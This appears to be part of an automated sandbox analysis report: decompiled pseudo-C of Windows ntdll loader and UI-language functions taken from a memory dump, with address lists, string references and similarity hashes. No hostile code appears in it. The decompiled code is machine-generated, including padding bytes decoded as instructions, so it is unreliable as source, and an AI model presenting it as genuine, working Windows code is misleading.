0x0134896b
0x0134896e
0x00000000
0x01348970
0x01348970
0x01348970
0x01348970
0x01348972
0x01348972
0x01348974
0x00000000
0x0134897a
0x0134897a
0x0134897d
0x00000000
0x01348983
0x01399c65
0x01399c6d
0x01399c72
0x01399c75
0x01399c75
0x01399c82
0x01399c86
0x01399c87
0x01399c88
0x01399c89
0x01399c8c
0x01399c90
0x01399c95
0x01399c97
0x01399ca0
0x01399ca3
0x01399ca9
0x01399ca9
0x00000000
0x01399ca9
0x01399ca3
0x00000000
0x01399c97
0x0134897d
0x00000000
0x01348974
0x01348988
0x01348992
0x01348996
0x00000000
0x01348996
0x0134894c
0x00000000
0x01348870
0x0134887b
0x0134887d
0x0134887f
0x01348881
0x01348884
0x01348884
0x01348886
0x01348889
0x0134888c
0x0134888e
0x01348891
0x01348891
0x01348898
0x00000000
0x00000000
0x0134889a
0x0134889b
0x0134889e
0x00000000
0x00000000
0x013488a0
0x013488a8
0x013488b0
0x013488b2
0x013488d3
0x013488d5
0x00000000
0x013488d7
0x013488db
0x013488dc
0x013488e0
0x013488e8
0x013488ee
0x013488f0
0x013488f3
0x013488fc
0x01348901
0x01348906
0x0134890c
0x0134890c
0x0134890f
0x01348916
0x01348917
0x01348918
0x01348919
0x0134891a
0x0134891f
0x01348921
0x01399c52
0x01399c55
0x01399c5b
0x01399cac
0x01399cc0
0x01399cc0
0x01399c55
0x01348927
0x01348927
0x0134892f
0x01348933
0x00000000
0x013488f5
0x013488f5
0x00000000
0x013488f7
0x013488f7
0x013488fa
0x00000000
0x00000000
0x00000000
0x00000000
0x013488fa
0x013488f5
0x013488f3
0x00000000
0x013488d5
0x00000000
0x013488b2
0x013488c9
0x00000000
0x013488c9
0x0134887f
0x0134886a
0x01348857
0x01348852
0x013488bf
0x013488bf
0x013487aa
0x013487ad
0x013487ae
0x013487b4
0x013487b5
0x013487b6
0x013487b8
0x013487bd
0x013487c1
0x013487f4
0x013487fa
0x00000000
0x00000000
0x00000000
0x013487c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01399C28
LdrpDoPostSnapWork, xrefs: 01399C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01399C18

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: f99e67fe3c6ab3523ec7a324a9610f5f7d1d740decce26de3a3d184db7354bdb
Instruction ID: 7c0ccf8001e96800fcbb4720260660cde144ce4989fed2adcddddeae1b9c0a13
Opcode Fuzzy Hash: f99e67fe3c6ab3523ec7a324a9610f5f7d1d740decce26de3a3d184db7354bdb
Instruction Fuzzy Hash: 7391F671A0021ADBEF28DF9DD881ABA7BF5FF4431CB5441A9EA05AB251D730F941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01347E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01347E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0134CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0133C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1425780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E013B5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1425780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01357D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01357D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E013B7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01357D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01357D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E013B7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0136A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0133B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01347e4c
0x01347e50
0x01347e55
0x01347e58
0x01347e5d
0x01347e71
0x01347f33
0x01347e77
0x01347e77
0x01347e79
0x01347e79
0x01347e7e
0x01347f45
0x01399848
0x00000000
0x01399848
0x01347f4e
0x01347f53
0x01347f5a
0x00000000
0x00000000
0x0139985a
0x01399862
0x01399866
0x00000000
0x0139986c
0x00000000
0x0139986c
0x01347e84
0x01347e84
0x01347e8d
0x01399871
0x01347eb8
0x01347ec0
0x01347ec0
0x01347e9a
0x0139987e
0x00000000
0x00000000
0x01399884
0x0139988b
0x013998a7
0x013998ac
0x013998b1
0x013998b6
0x013998b8
0x013998b8
0x013998b9
0x00000000
0x013998b9
0x01347ea0
0x01347ea7
0x00000000
0x00000000
0x01347eac
0x01347eb1
0x01347ec6
0x01347ed0
0x013998cc
0x01347ed6
0x01347ed6
0x01347ed6
0x01347ede
0x01347ee3
0x013998e3
0x013998f0
0x01399902
0x013998f2
0x013998fb
0x013998fb
0x01399907
0x0139991d
0x0139991d
0x01399907
0x013998e3
0x01347ef0
0x01347f14
0x01347f14
0x01347f1e
0x01399946
0x01347f24
0x01347f24
0x01347f24
0x01347f2c
0x0139996a
0x01399975
0x01399975
0x0139997e
0x01399993
0x01399993
0x0139997e
0x00000000
0x01347ef2
0x01347efc
0x01347f0a
0x01347f0e
0x01399933
0x00000000
0x01399933
0x00000000
0x01347f0e
0x00000000
0x00000000
0x00000000
0x01347eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01399891
minkernel\ntdll\ldrmap.c, xrefs: 013998A2
LdrpCompleteMapModule, xrefs: 01399898

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 14bb37bda405f1bc03854ad510f720bb1bc48afa09c64001decbbc306d1b2c1d
Instruction ID: be3e1945ecd96ac0d7634df35f3c7981408a9fc0d46ca9d13782e98a196e3ad6
Opcode Fuzzy Hash: 14bb37bda405f1bc03854ad510f720bb1bc48afa09c64001decbbc306d1b2c1d
Instruction Fuzzy Hash: 8C51E031604746DBEB32CB6CC944B6ABBE4AB4471CF0406A9EA559BBE1D730FD81C790

Uniqueness

Uniqueness Score: -1.00%

Function 0133E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0133E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0133F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E013795D0();
						}
						if(_t78 != 0) {
							L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0137FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0137BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01379600();
					if(_t97 < 0) {
						goto L6;
					}
					E0137BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0133F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0137BB40(_t83, _t102 + 0x24, _t78);
								if(L013443C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0137BB40(_t84, _t102 + 0x24, _t94);
									if(L013443C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0133e620
0x0133e628
0x0133e62f
0x0133e631
0x0133e635
0x0133e637
0x0133e63e
0x01395503
0x01395503
0x0133e64c
0x0133e64c
0x0133e651
0x00000000
0x00000000
0x0133e661
0x0133e665
0x0139542a
0x0133e715
0x0133e71a
0x0133e71c
0x0133e720
0x0133e720
0x0133e727
0x0133e736
0x0133e736
0x0133e743
0x0133e743
0x0133e673
0x0133e678
0x0133e67d
0x0133e682
0x0133e685
0x0133e692
0x0133e69b
0x0133e6a3
0x0133e6ad
0x0133e6b1
0x0133e6b2
0x0133e6bb
0x0133e6bf
0x0133e6c0
0x0133e6c8
0x0133e6cc
0x0133e6d5
0x0133e6d9
0x00000000
0x00000000
0x0133e6e5
0x0133e6ea
0x0133e6f9
0x0133e70b
0x0133e70f
0x01395439
0x0139545e
0x0139545e
0x00000000
0x0139545e
0x0139543b
0x0139543e
0x01395440
0x01395445
0x01395472
0x01395475
0x0139548d
0x01395493
0x013954a9
0x00000000
0x00000000
0x013954ab
0x013954b4
0x013954bc
0x013954c8
0x013954de
0x013954fb
0x013954e0
0x013954e6
0x013954eb
0x013954eb
0x013954de
0x00000000
0x013954bc
0x01395477
0x0139547a
0x01395480
0x01395483
0x01395486
0x0139548b
0x00000000
0x00000000
0x00000000
0x0139548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01395447
0x01395447
0x01395447
0x01395447
0x0139544e
0x00000000
0x00000000
0x01395450
0x01395452
0x01395455
0x0139545a
0x00000000
0x00000000
0x00000000
0x0139545c
0x0139546a
0x0139546d
0x0139546f
0x00000000
0x0139546f
0x0133e70f

Strings

InstallLanguageFallback, xrefs: 0133E6DB
@, xrefs: 0133E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0133E68C

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: a3928a871aeb115c7892e9d15a9eb5eb1bf361a13a84288993db446a932d468b
Instruction ID: 362de55828205767465f87810047cd683e236ef09f8ae2ebb6d375d72c01e236
Opcode Fuzzy Hash: a3928a871aeb115c7892e9d15a9eb5eb1bf361a13a84288993db446a932d468b
Instruction Fuzzy Hash: 6C51B2766043469BDB26DF28C440A7BB7E8BF88658F45093EF985E7240F734D944C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0136FAB0, Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0136FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0134EEF0(0x1427b60);
					_t134 =  *0x1427b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1427b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1427b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01346D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E013476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E013D8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0133B150();
													}
													_t116 = E013D6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E013475CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1428638; // 0x0
																	_t122 = L013438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E013476E2(_t154);
																			goto L41;
																		}
																	} else {
																		E013476E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0136FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L013470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0136FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0136FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0136FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0136FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0136FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1427b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1427b84 = _t75;
						_t73 = E0134EB70(_t134, 0x1427b60);
						if( *0x1427b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0134FF60( *0x1427b20);
							}
						}
						goto L5;
					}
				}
			}

0x0136fab0
0x0136fab2
0x0136fab3
0x0136fab4
0x0136fabc
0x0136fac0
0x0136fb14
0x0136fb17
0x0136fac2
0x0136fac8
0x0136facd
0x0136fad3
0x0136fad3
0x0136fadd
0x0136fb18
0x0136fb1b
0x0136fb1d
0x0136fb1e
0x0136fb1f
0x0136fb20
0x0136fb21
0x0136fb22
0x0136fb23
0x0136fb24
0x0136fb25
0x0136fb26
0x0136fb27
0x0136fb28
0x0136fb29
0x0136fb2a
0x0136fb2b
0x0136fb2c
0x0136fb2d
0x0136fb2e
0x0136fb2f
0x0136fb3a
0x0136fb3b
0x0136fb3e
0x0136fb41
0x0136fb44
0x0136fb47
0x0136fb4a
0x0136fb4d
0x0136fb53
0x013abdcb
0x013abdcb
0x0136fb59
0x0136fb5b
0x0136fb5b
0x0136fb5e
0x013abdd5
0x013abdd8
0x00000000
0x013abdda
0x00000000
0x013abdda
0x0136fb64
0x0136fb64
0x0136fb64
0x0136fb67
0x0136fb6e
0x0136fb70
0x0136fb72
0x00000000
0x0136fb78
0x0136fb7a
0x0136fb7a
0x0136fb7d
0x0136fb80
0x013abddf
0x013abde1
0x00000000
0x013abde3
0x00000000
0x013abde3
0x0136fb86
0x0136fb86
0x0136fb86
0x0136fb8b
0x0136fb90
0x0136fb92
0x0136fb94
0x0136fb9a
0x0136fb9b
0x0136fba1
0x013abde8
0x013abdeb
0x013abded
0x013abeb5
0x013abeb5
0x013abebb
0x013abebd
0x013abec3
0x013abed2
0x013abedd
0x013abedd
0x013abeed
0x00000000
0x013abdf3
0x013abdfe
0x013abe06
0x013abe0b
0x013abe0d
0x013abe0f
0x013abe14
0x013abe19
0x013abe20
0x013abe25
0x013abe27
0x013abe35
0x013abe39
0x013abe46
0x013abe4f
0x013abe54
0x013abe56
0x013abef8
0x013abef8
0x00000000
0x013abe5c
0x013abe5c
0x013abe60
0x00000000
0x013abe66
0x013abe66
0x013abe7f
0x013abe84
0x013abe87
0x013abe89
0x013abe8b
0x013abe99
0x013abe9d
0x013abea0
0x013abeac
0x013abeaf
0x013abeb1
0x013abeb3
0x013abeb3
0x00000000
0x013abea2
0x013abea2
0x00000000
0x013abea2
0x013abe8d
0x013abe8d
0x013abe92
0x00000000
0x013abe92
0x013abe8b
0x013abe60
0x013abe3b
0x013abe3b
0x013abe3e
0x00000000
0x013abe40
0x013abe40
0x013abe44
0x00000000
0x00000000
0x00000000
0x00000000
0x013abe44
0x013abe3e
0x013abe29
0x013abe29
0x00000000
0x013abe29
0x013abe27
0x00000000
0x0136fba7
0x0136fba7
0x0136fbab
0x013abf02
0x0136fbb1
0x0136fbb1
0x0136fbb8
0x0136fbbd
0x0136fbbd
0x0136fbbf
0x0136fbbf
0x0136fbc5
0x0136fbcb
0x0136fbf8
0x0136fbf8
0x0136fbfa
0x00000000
0x0136fc00
0x0136fc00
0x0136fc03
0x00000000
0x0136fc09
0x0136fc09
0x0136fc0f
0x0136fc15
0x0136fc23
0x0136fc23
0x0136fc25
0x0136fc27
0x0136fc75
0x0136fc7c
0x0136fc84
0x00000000
0x0136fc29
0x0136fc29
0x0136fc2d
0x0136fc30
0x013abf0f
0x00000000
0x0136fc36
0x0136fc38
0x0136fc3b
0x0136fc41
0x013abf17
0x013abf19
0x013abf48
0x013abf4b
0x00000000
0x013abf1b
0x013abf22
0x013abf24
0x013abf26
0x00000000
0x013abf2c
0x013abf37
0x013abf39
0x013abf3b
0x00000000
0x013abf41
0x013abf41
0x013abf41
0x013abf41
0x013abf45
0x00000000
0x013abf45
0x013abf3b
0x013abf26
0x00000000
0x0136fc47
0x0136fc47
0x0136fc49
0x0136fcb2
0x0136fcb4
0x0136fcb6
0x0136fcdc
0x0136fcdc
0x00000000
0x0136fcb8
0x0136fcc3
0x0136fcc5
0x0136fcc7
0x00000000
0x0136fcc9
0x0136fcc9
0x0136fccd
0x00000000
0x0136fccd
0x0136fcc7
0x00000000
0x0136fc4b
0x0136fc4b
0x0136fc4e
0x0136fc4e
0x0136fc51
0x0136fc51
0x0136fc54
0x0136fc5a
0x0136fc5c
0x0136fc5f
0x0136fc61
0x0136fc63
0x0136fc65
0x0136fc67
0x0136fc6e
0x0136fc72
0x0136fc72
0x0136fc72
0x0136fc72
0x0136fc67
0x0136fc61
0x00000000
0x0136fc5a
0x0136fc49
0x0136fc41
0x0136fc30
0x0136fc27
0x0136fc03
0x0136fbcd
0x0136fbd3
0x0136fbd9
0x0136fbdc
0x0136fbde
0x0136fc99
0x0136fc9b
0x0136fc9d
0x0136fcd5
0x0136fcd5
0x0136fc89
0x0136fc89
0x00000000
0x0136fc9f
0x0136fc9f
0x0136fca3
0x00000000
0x0136fca3
0x00000000
0x0136fbe4
0x0136fbe4
0x0136fbe4
0x0136fbe4
0x0136fbe9
0x0136fbf2
0x00000000
0x0136fbf2
0x0136fbde
0x0136fbcb
0x0136fbab
0x0136fc8b
0x0136fc8b
0x0136fc8c
0x0136fb80
0x0136fb72
0x0136fb5e
0x0136fc8d
0x0136fc91
0x0136fadf
0x0136fadf
0x0136fae1
